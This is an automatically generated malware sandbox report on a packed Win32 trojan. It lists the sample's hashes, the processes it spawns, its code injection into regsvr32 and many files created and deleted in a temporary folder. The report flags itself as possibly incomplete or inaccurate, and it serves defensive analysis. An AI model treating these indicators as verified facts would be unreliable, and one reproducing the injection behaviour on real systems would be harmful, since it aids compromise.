Trojan.Generic.15497931 (B) (Emsisoft), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: b205e9e66f7ea115dc5ff46f5407b7b5
SHA1: 03860f55357370af3d91ac4fe15307338b5b3c26
SHA256: 2840ae3ab79e5eb7d83b59afb936101e5081ea36597f1b68a07d2100629b53f9
SSDeep: 6144:qP5R27KwOk08685hZnD0AYB0tDKa0nIawR:qPPnz8zXZQAa0tDKaOBwR
Size: 250937 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-12-21 21:41:32
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
mofcomp.exe:3308
WindowsXP-KB968930-x86-ENG.exe:2232
ngen.exe:216
ngen.exe:2432
ngen.exe:1308
ngen.exe:2440
ngen.exe:1904
ngen.exe:1712
ngen.exe:1980
ngen.exe:1944
ngen.exe:652
ngen.exe:1560
ngen.exe:816
ngen.exe:1236
ngen.exe:560
ngen.exe:2448
ngen.exe:2424
ngen.exe:1916
ngen.exe:1624
ngen.exe:4076
ngen.exe:1240
ngen.exe:2000
ngen.exe:500
ngen.exe:1572
ngen.exe:1380
update.exe:2296
mscorsvw.exe:2860
mscorsvw.exe:4088
mscorsvw.exe:2652
mscorsvw.exe:2296
mscorsvw.exe:3888
mscorsvw.exe:2948
mscorsvw.exe:3296
mscorsvw.exe:1904
mscorsvw.exe:1632
mscorsvw.exe:3044
mscorsvw.exe:2920
mscorsvw.exe:2428
mscorsvw.exe:1096
mscorsvw.exe:2816
mscorsvw.exe:2420
mscorsvw.exe:1948
mscorsvw.exe:2728
mscorsvw.exe:2956
mscorsvw.exe:2764
mscorsvw.exe:3680
mscorsvw.exe:3440
mscorsvw.exe:1388
mscorsvw.exe:2256
mscorsvw.exe:1152
PSCustomSetupUtil.exe:3592
PSCustomSetupUtil.exe:3496
PSCustomSetupUtil.exe:3828
PSCustomSetupUtil.exe:2096
PSCustomSetupUtil.exe:3732
PSCustomSetupUtil.exe:3652
PSCustomSetupUtil.exe:3692
PSCustomSetupUtil.exe:3856
PSCustomSetupUtil.exe:2176
PSCustomSetupUtil.exe:2072
PSCustomSetupUtil.exe:2288
PSCustomSetupUtil.exe:3628
PSCustomSetupUtil.exe:3400
PSCustomSetupUtil.exe:3520
PSCustomSetupUtil.exe:3756
PSCustomSetupUtil.exe:3544
PSCustomSetupUtil.exe:3780
PSCustomSetupUtil.exe:3464
PSCustomSetupUtil.exe:3332
PSCustomSetupUtil.exe:3376
PSCustomSetupUtil.exe:3424
PSCustomSetupUtil.exe:2168
PSCustomSetupUtil.exe:1060
PSCustomSetupUtil.exe:2064
PSCustomSetupUtil.exe:2252
PSCustomSetupUtil.exe:2104
PSSetupNativeUtils.exe:2572
regsvr32.exe:1968
regsvr32.exe:404
wsmanhttpconfig.exe:3220
wsmanhttpconfig.exe:3288
%original file name%.exe:2044
The Trojan injects its code into the following process(es):
regsvr32.exe:684
regsvr32.exe:1260
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process mofcomp.exe:3308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (0 bytes)
The process WindowsXP-KB968930-x86-ENG.exe:2232 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\6c23dc75f57bb04ba83a51fb3e\winrm.cmd (35 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_requires.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_script_internationalization.help.txt (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_redirection.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.wsman.runtime.dll (33 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pwrshsip.dll (24 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_join.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.wsman.management.dll (5010 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_pssnapins.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\eula.txt (586 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_escape_characters.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_windows_powershell_2.0.help.txt (453 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_properties.help.txt (7 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_format.ps1xml.help.txt (17 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\getevent.types.ps1xml (15 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_ws-management_cmdlets.help.txt (405 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_prompts.help.txt (7 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrscmd.dll (2907 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrs.exe (1154 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrsmgr.dll (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\diagnostics.format.ps1xml (590 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\spcustom.dll (23 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_script_blocks.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_assignment_operators.help.txt (379 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\windowsremoteshell.adm (12 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_foreach.help.txt (10 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\bitstransfer.psd1 (950 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_while.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\registry.format.ps1xml (20 bytes)
C:\$Directory (800 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pwrshmsg.dll (4 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_for.help.txt (146 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_preference_variables.help.txt (37 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_logical_operators.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\windowsremotemanagement.adm (574 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\kb968930xp.cat (512 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\system.management.automation.dll (38414 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_command_precedence.help.txt (8 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_core_commands.help.txt (221 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_bits_cmdlets.help.txt (7 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.editor.resources.dll (562 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote.help.txt (7 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_comment_based_help.help.txt (595 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\$shtdwn$.req (788 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershell.exe (7339 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.consolehost.dll (3118 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmanhttpconfig.exe (3009 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_session_configurations.help.txt (276 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_split.help.txt (10 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.editor.dll (14450 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrm.vbs (2727 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wtrinstaller.ico (4803 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\default.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\certificate.format.ps1xml (155 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_profiles.help.txt (457 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_arrays.help.txt (8 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_pipelines.help.txt (411 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_job_details.help.txt (824 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmwmipl.dll (2816 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrshost.exe (22 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update (4 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_wildcards.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_output.help.txt (887 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_return.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_do.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_locations.help.txt (794 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_signing.help.txt (12 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.management.dll (3386 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmauto.dll (1842 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\types.ps1xml (2510 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions.help.txt (586 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_parsing.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_ref.help.txt (1 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_if.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_commonparameters.help.txt (12 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_command_syntax.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_operators.help.txt (770 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_debuggers.help.txt (21 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_jobs.help.txt (13 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmprovhost.exe (657 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_aliases.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_scripts.help.txt (12 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_break.help.txt (792 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_try_catch_finally.help.txt (7 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_type_operators.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pwrshplugin.dll (802 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmtxt.xsl (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions_advanced_parameters.help.txt (962 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_comparison_operators.help.txt (11 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\bitstransfer.format.ps1xml (16 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_jobs.help.txt (12 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_trap.help.txt (10 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_quoting_rules.help.txt (659 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wevtfwd.dll (3351 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pssetupnativeutils.exe (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_pssession_details.help.txt (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershell_ise.exe (2526 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\spuninst.exe (3787 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_execution_policies.help.txt (13 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\system.management.automation.resources.dll (3153 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrm.ini (1956 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershell.exe.mui (10 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_arithmetic_operators.help.txt (168 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_wmi_cmdlets.help.txt (8 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_types.ps1xml.help.txt (481 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_pssessions.help.txt (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrmprov.dll (591 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\update.exe (10748 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_environment_variables.help.txt (417 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_requirements.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_regular_expressions.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmplpxy.dll (603 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_switch.help.txt (489 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_hash_tables.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_data_sections.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\spmsg.dll (495 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_special_characters.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_line_editing.help.txt (1 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_throw.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_faq.help.txt (775 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_automatic_variables.help.txt (14 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsman.format.ps1xml (837 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmpty.xsl (1 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\help.format.ps1xml (3947 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\update.inf (2457 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\filesystem.format.ps1xml (133 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_parameters.help.txt (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershellcore.format.ps1xml (1492 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pspluginwkr.dll (1756 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_reserved_words.help.txt (1 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.security.dll (1145 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions_advanced.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_troubleshooting.help.txt (146 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions_advanced_methods.help.txt (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_methods.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmsvc.dll (15909 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\updspapi.dll (5940 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershell_ise.resources.dll (4 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\dotnettypes.format.ps1xml (266 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershelltrace.format.ps1xml (344 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\spupdsvc.exe (287 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_providers.help.txt (59 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pscustomsetuputil.exe (316 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_modules.help.txt (13 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrmprov.mof (789 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\eventforwarding.adm (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_variables.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_objects.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.wsman.management.resources.dll (13 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_transactions.help.txt (1011 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\profile.ps1 (772 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\system.management.automation.dll-help.xml (16567 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_language_keywords.help.txt (11 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_windows_powershell_ise.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\update.ver (14 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrssrv.dll (12 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.security.resources.dll (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_path_syntax.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_scopes.help.txt (76 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\windowspowershellhelp.chm (26041 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_continue.help.txt (1 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmauto.mof (4 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_eventlogs.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmres.dll (6164 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\importallmodules.psd1 (438 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_history.help.txt (3 bytes)
The Trojan deletes the following file(s):
C:\6c23dc75f57bb04ba83a51fb3e\about_pssnapins.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_script_internationalization.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_redirection.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.wsman.runtime.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pwrshsip.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\spupdsvc.exe (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.wsman.management.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_ref.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\eula.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_methods.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrshost.exe (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_hash_tables.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_format.ps1xml.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.security.dll-help.xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\getevent.types.ps1xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_ws-management_cmdlets.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrscmd.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrs.exe (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_parsing.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\diagnostics.format.ps1xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\spcustom.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_script_blocks.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_assignment_operators.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershelltrace.format.ps1xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_foreach.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\bitstransfer.psd1 (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions_advanced_parameters.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\registry.format.ps1xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pwrshmsg.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_for.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pssetupnativeutils.exe (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_preference_variables.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_jobs.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\windowsremotemanagement.adm (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\kb968930xp.cat (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\system.management.automation.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\types.ps1xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.wsman.management.dll-help.xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_wildcards.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_command_precedence.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_core_commands.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_if.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.editor.resources.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_comment_based_help.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wevtfwd.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrm.cmd (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershell.exe (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrssrv.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\system.management.automation.resources.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_windows_powershell_ise.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_split.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.editor.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrm.vbs (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_escape_characters.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmtxt.xsl (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\certificate.format.ps1xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.graphicalhost.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.diagnostics.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.gpowershell.resources.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_arrays.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_pipelines.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_job_details.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_try_catch_finally.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_windows_powershell_2.0.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\compiledcomposition.microsoft.powershell.gpowershell.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_output.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_return.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_do.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_locations.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_signing.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmsvc.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\default.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmauto.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_profiles.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_bits_cmdlets.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_commonparameters.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_command_syntax.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmanhttpconfig.exe (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_operators.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_debuggers.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_jobs.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.backgroundintelligenttransfer.management.dll-help.xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions_advanced_methods.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershellcore.format.ps1xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_scripts.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_break.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_type_operators.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pwrshplugin.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.diagnostics.resources.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_while.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_comparison_operators.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\bitstransfer.format.ps1xml (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_logical_operators.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_trap.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_quoting_rules.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrsmgr.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_requires.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_pssession_details.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.security.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershell_ise.exe (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\spuninst.exe (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_execution_policies.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.consolehost.dll (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrm.ini (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershell.exe.mui (0 bytes)
C:\_301718_ (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_arithmetic_operators.help.txt (0 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_wmi_cmdlets.help.txt (0 bytes)
